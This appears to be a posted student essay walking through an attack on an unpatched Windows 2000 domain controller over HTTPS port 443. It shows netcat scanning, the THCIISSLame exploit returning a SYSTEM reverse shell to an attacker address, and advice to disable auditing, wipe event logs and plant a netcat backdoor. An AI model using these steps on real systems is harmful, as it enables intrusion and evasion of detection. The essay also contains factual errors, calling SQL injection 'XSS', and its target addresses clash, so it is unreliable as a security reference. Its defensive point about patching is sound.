Using of Windows 2000 - Essay Example

The internet is growing by leaps and bounds with every passing day. More and more human functions are migrating to the internet. These functions include commerce and other related activities too. Myriad protocols have been developed over the years to protect computing systems that employ commerce transactions and contain highly confidential information. This information includes names, credit card numbers, credit histories, social security numbers, bank account details, addresses, phone numbers and the like. There is a dire need to protect such information from prying eyes. (Scambray et al., 2003) The reputation of a company might be at stake if such information would be divulged. Moreover, people’s privacy would be compromised on a grandiose scale too if such information went public. There is also the risk of exploitation of such information. In order to protect these computing systems, numerous systems have been developed but loopholes still remain. This text is centred on an exploit for port 443 for a Windows 2000 based domain controller. Table of Contents Abstract 1 Introduction 3 Vulnerabilities in Networks 3 Delineating HTTPS and Port 443 4 Case Study 4 Assumptions 4 Way Forward 5 Analysis of Assumptions 5 Gathering Intel for Attack 5 Accessing the Server 6 Reason for Buffer Overflow 8 Securing a Foothold 8 Conclusion 9 Bibliography 10 Introduction Windows 2000 was developed by Microsoft as a business solution to host data and other services. A total of four different editions of Windows 2000 were released which were Professional, Server, Advanced Server and Datacentre Server. Other limited editions were also released by Microsoft in 2001 but the baseline of Windows 2000 being a business machine persisted. (Pastore, 2003) On its release, Windows 2000 was marketed as the most secure Windows ever built. (Microsoft, 2000) However security flaws within the Windows 2000 framework continued to plague the system right till the lifecycle end in July 2010 when Microsoft stopped issuing new security updates. (Microsoft, 2011) Vulnerabilities in Networks Windows 2000 has been likened to the eggshell concept. Similar to the egg’s shell, the exterior security layer is robust yet vulnerable. However, as soon as the exterior security layer is breached, the inside of the network is “mushy” and easier to manipulate. This general principle is not limited to Windows 2000 based network servers but to networks in general too. (Ethical Hacker Network, 2011) In general various vulnerabilities exist on network machines especially in respect to ports that can be scanned and accessed for intrusion. The possible exposed ports all have the potential to be converted into vectors for an attack on the concerned machine. The most common ports utilised by various applications on a typical Windows based machine are listed below to delineate vulnerability. (Ethical Hacker Network, 2011) TCP Port Applications 20 FTP data channel 21 FTP control channel 23 Telnet 25 SMTP 53 Connection oriented DNS (resolution on UDP 53) 80 HTTP 88 Internet Key Exchange (IKE) 110 POP3 (mail) 135 Windows RPC Endpoint Mapper 137 NETBIOS Name Service 139 NETBIOS Session 389 LDAP 443 HTTP/S 445 Common Internet File System / native SMB on Windows 2000 and higher 636 LDAP over SSL 1433 SQL Server (1434 if the port scanner can perform UDP too) 1723 PPTP 3268 LDAP to a Windows Global Catalogue Server 3389 Remote Desktop Protocol (Windows Terminal Service) It must be kept in mind that these ports are available for Windows based machines. If other OS are being utilised, the machine’s vulnerability may lie at other ports which would be open. (McInerney, 2000) This investigation is concerned with port 443 used for HTTP/S services and so it will be looked into in more detail. Delineating HTTPS and Port 443 HTTPS (Hyper Text Transfer Protocol) is a combination of the simple HTTP with an additional SST/TLS security layer. This helps to encrypt data being moved through web pages. Generally this protocol is used for online payments and transactions. HTTPS is designed to create a totally secure channel over an otherwise insecure network. The contention is to provide adequate protection from eavesdroppers as well as man in the middle attacks given of course that reasonable ciphers are being utilised and that the server’s certificate is both verified and trusted. (Cox & Sheldon, 2001) Internet browsers are bound to ask for certificates if an HTTPS connection is to be established. HTTP layers begin with the suffix “http://” and use port 80 by default. On the other hand, HTTPS utilises the suffix “https://” and uses port 443 by default. (Eckersley, 2010) Case Study Assumptions For the current case study it is assumed that the concerned machine is running Windows 2000 and is being used as a domain controller. The particular version of Windows 2000 being used is Advanced Server. The IP address of the machine is 192.168.204.13 and the only port visible to the intruder is TCP port 443. Moreover, the concerned server is not utilising IP-Sec or Kerberos at all and no service packs have been installed on the server in question. Way Forward In order to intrude the server in question, the attacker would have to first create a picture of the entire network by using different tools. Once the attacker would have a complete picture of the network, he could better choose tools to penetrate the system. Once the right tools are used to penetrate the system, the attacker can very easily exploit vulnerabilities in Windows to his advantage. An explanation of these steps and the precautions required on the part of the attacker are listed below. Analysis of Assumptions The assumptions imply that the only port visible on the target machine is port 443. This implies that the machine is utilising some kind of port blocking system. Either of two things could be true: the server could be running a firewall or the server could be protected by a router that acts as a gatekeeper. It is also highly likely that such a system would have IDS (Intrusion Detection System) installed as well. Thus, the attacker should do their best to limit traffic so that their cyber location is not compromised. In case that a lot of communication is required, the attacker would have to utilise some IP hopping tools too. Furthermore, the server is not using either IP-Sec or Kerberos which means that the intruder will not have to face encrypted communication. Gathering Intel for Attack Before an attack is commenced, it is vital to find out what the network topology is. Various tools are available to this effect. The various kinds of information that can be extracted from “network foot printing” include (but are not limited to): network and address ranges; host names; exposed hosts; applications exposed on hosts; OS and application version information; patched states of both host and applications; structure of applications and structures of back end servers. One notable technique is to utilise the ICMP (Internet Control Message Protocol) given of course that it has not been blocked. (Network Sorcery, 2011) In a majority of cases, this service is not blocked. It is advisable to check for this protocol as under: c:\DiscoverHosts 192.168.204 192.168.204.13 Given that the ICMP protocol is blocked, various port scanners can be utilised to discover this information. The list of tools is huge but the more notable ones include nmap, enum, LANguard, netcat etc. Using any typical port scanner would reveal something like the one below: C:\warez\portscan Port 192.168.204.13:443 open Port 192.168.204.13:80 open For this case, netcat was used to scan ports and the output is presented below: C:\> nc –v –w2 –z 192.168.204.13 1-500 W2KSP0 [192.168.204.13] 80 (http) open W2KSP0 [192.168.204.13] 443 (https) open The –z switch has been used to ensure that no data is sent to a TCP connection and that very limited data is sent to a UDP connection. Moreover, if the attacker wishes to instil delays between scans, then the –i switch can be used. This ensures that a slow scan is performed. This is particularly useful for the attacker in order to mask their identity. (Netcat, 2011) This information reveals that the particular machine in question is a web server since it has port 80 open to support HTTP and also has port 443 open to support HTTPS. It is being assumed here that port 80 is also open because it would be very strange if HTTP were not being supported on a web server. However, the network intrusion scheme would still be worked through port 443 only. Another issue must be noted here as well. If port 443 were closed, it would still be possible to get through to the DC (Domain Controller) by routing the attack through the web server and through the DMZ. However, it is assumed here that port 443 was already open. Accessing the Server Once network topology has been established, the next step is to find a foothold in the network. For this case, the DC is going to be attacked directly. No auxiliary machines are deemed present. We will now establish a connection to the DC using the port 443. This connection will be used to transfer malware or tools that can be used to cause further disruption or intrusion on the targeted systems. However, data can only be transferred to the server if such an exploit is available. Commonly, the most favourite exploit at work is the buffer overflow exploit. Buffers are memory allocations where applications store information and these buffers may overflow under certain conditions. Often as the length of the stored data is not checked by the application, the buffer tends to overflow with the excess data. The overflowing data from the buffer is released to the operating system’s stack where it is executed. This data is not the property of any particular user on the system and thus it is the operating system’s ownership that evaluates this data. In Windows based systems, the operating system has far greater privileges than average users and any data that is transported and executed by the system is unquestionable. The data executable is actually given OS or system privileges. The data that is frequently moved by attackers is the simple command shell. This enables the attacker to remotely utilise the attacked machine as a system privileged user. The open port ensures connectivity. Therefore, the attacker actually becomes the system master using this method. Given that we are utilising a HTTPS based port, the presence of a database is pretty obvious. The second exploit depends on a method known better as “SQL injection”. SQL injection depends on poor coding on the server side to transfer information and data by utilising a database’s capabilities. The inputs are actually passed to the application using the database which in turn moves invalidated data to the DBMS (Database Management System). The DBMS tends to interpret the inputs as legitimate because they are passed as legitimate. The query being executed by the DBMS can thus be rewritten and this enables the attacker to rewrite a query which favours his inputs. (Ethical Hacker Network, 2011) The commonest vulnerability in this sense is known as the XSS (cross site scripting) where the user’s input is directly echoed to the screen. Often the username field is written as “xxx OR 1=1;--“. This forces the DBMS to consider that the user is already logged in by considering that the statement terminates in 1=1 which is always going to be true. XSS is reliably used to exploit systems with DBMS (Ethical Hacker Network, 2011) but running a DBMS and writing a web application to prove the concept was not practicable for this exercise. Hence, the buffer overflow technique will be utilised in this text to access a server machine that is a DC. Various exploits are available that take advantage of the port 443 vulnerability. One such tool is Johnny Cyberpunk’s THCIISSLame. Johnny belongs to The Hacker’s Choice and posted thciislame.c to various mailing lists which exploited the Windows 2000 running IIS through the vulnerable library bound SSL port 443. This exploit simply sends a remote shell that runs as SYSTEM on a user defined port on the attacking machine. The output from the exploit is shown below for this case study. C:\tools>thciisslame 192.168.230.13 192.168.234.2 31337 THCIISSLame v0.2 IIS 5.0 SSL remote root exploit tested on Windows 2000 Server german/english SP4 by Johnny Cyberpunk (jcyberpunk@thc.org) [*] building buffer [*] connecting the target [*] exploit send [*] waiting for shell Microsoft Windows 2000 [Version 5.00.2195] © Copyright 1985-2000 Microsoft Corp. C:\Windows\system32> Reason for Buffer Overflow Technically this buffer overflow exploit stems from the use of legacy code in the SSL layer. The use of an old protocol known better as PCT (Private Communications Transport) causes this vulnerability to surface. This problem came to surface in April 2004 when Microsoft published its security bulletin MS04-011 which reported that ISS (Internet Security System) had found a buffer overflow in the library that is used to implement SSL for IIS. PCT is an early protocol that had been used by Microsoft to provide cryptographic support to HTTP. (ISS, 2008) However, this protocol had been superseded by SSL years ago while the legacy code had not yet been removed. This code was still in fact being used to provide SSL support within IIS. (Fly Lib, 2011) It must be kept in mind that had this particular machine be patched; we would not have been able to perform a penetration. Windows Server 2003 has the PCT protocol closed by default to ensure that this exploit cannot be used. Securing a Foothold The exploit output above indicates that the system intrusion using buffer overflows has worked successfully. Now it is pertinent to check what status we have as a user in the system. For this the simple “whoami” is used to discern user privileges. C:\winnt\system32>whoami NT AUTHORITY\SYSTEM The exploit has successfully provided us with system privileges as mentioned before and this provides us a free hand to do as we wish. The attacker has a number of options at his disposal now. At this stage, most attackers tend to upload command line and other tools to the attacked machine in order to gain a permanent foothold. Attempts at securing the user and passwords on the target machine could also be made and new users could be added as well. However, it is often more convenient to leave behind a trusted tool that will enable connecting every time with ease. Netcat is one such versatile tool. However, before using “netcat” it is advisable to remove all traces of an attack. “auditpol” is often utilised to stop the auditing of system events. (Microsoft, 2010) Similarly, the “elsave” tool is utilised to remove any event logs that were generated as a result of the attack. This ensures that the attacker’s presence and intrusion remains undetected. (IBT, 1999) “netcat” can be utilised to perform a variety of functions for the attacker (MUTS, 2010) which include (but are not limited to): serving as a backdoor or connect shell; serving as a reverse backdoor or as a reverse shell; transferring files (both from the attacker and the attacked machines); serving as a “honeypot” (recording incoming traffic information); remote execution. It would be impracticable to show all the various things that “netcat” could do so such an explanation has been avoided. Conclusion The text above shows how simple exploits on common ports of the un-patched Windows 2000 system can be utilised with ease using a prescribed methodology. The access to this system is all the more worrisome as the attacked system was a DC (Domain Controller). The records that could have been exploited include (but are not limited to) user accounts databases, transactional details, personal sensitive information etc. The need to stay up to date in terms of the various patches offered by Microsoft is obvious given the ease with which the attack was performed. Bibliography Cox, P. & Sheldon, T., 2001. Windows 2000 Security Handbook. Osborne. Eckersley, P., 2010. Encrypt the Web with the HTTPS everywhere extensions. [Online] Available at: https://www.eff.org/deeplinks/2010/06/encrypt-web-https-everywhere-firefox-extension [Accessed 30 July 2011]. Ethical Hacker Network, 2011. Anatomy of a Hack. [Online] Available at: http://www.ethicalhacker.net/content/view/8/2/ [Accessed 29 July 2011]. Fly Lib, 2011. Manual: Hacking Exposed (Unauthenticated Attacks). [Online] Available at: http://flylib.com/books/en/2.818.1.30/1/ [Accessed 30 July 2011]. IBT, 1999. ELSave. [Online] Available at: http://www.ibt.ku.dk/jesper/ELSave/ [Accessed 31 July 2011]. ISS, 2008. Threat List. [Online] Available at: http://xforce.iss.net/xforce/alerts/id/168 [Accessed 31 July 2011]. McInerney, M., 2000. Windows NT Security. New York: Prentice Hall. Microsoft, 2000. Microsoft and CyberSafe extend Windows 2000 security around the enterprise. [Online] Available at: http://www.microsoft.com/Presspass/press/2000/jan00/cybersafepr.mspx [Accessed 28 July 2011]. Microsoft, 2010. Auditpol. [Online] Available at: http://technet.microsoft.com/en-us/library/cc731451%28WS.10%29.aspx [Accessed 31 July 2011]. Microsoft, 2011. Microsoft Product Lifecycle Search. [Online] Available at: http://support.microsoft.com/lifecycle/search/?sort=PN&alpha=Windows+2000&Filter=FilterNO [Accessed 29 July 2011]. MUTS, 2010. Netcat 101. [Online] Available at: http://www.leetupload.com/database/Misc/Papers/NetCat_new.pdf [Accessed 31 July 2011]. Netcat, 2011. Netcat 1.10. [Online] Available at: http://nc110.sourceforge.net/ [Accessed 31 July 2011]. Network Sorcery, 2011. ICMP, Internet Control Message Protocol. [Online] Available at: http://www.networksorcery.com/enp/protocol/icmp.htm [Accessed 31 July 2011]. Pastore, M., 2003. A+ Certification Study Guide. McGraw Hill. Scambray, J., McClure, S. & Kurtz, G., 2003. Hacking Exposed. Osborne. Read More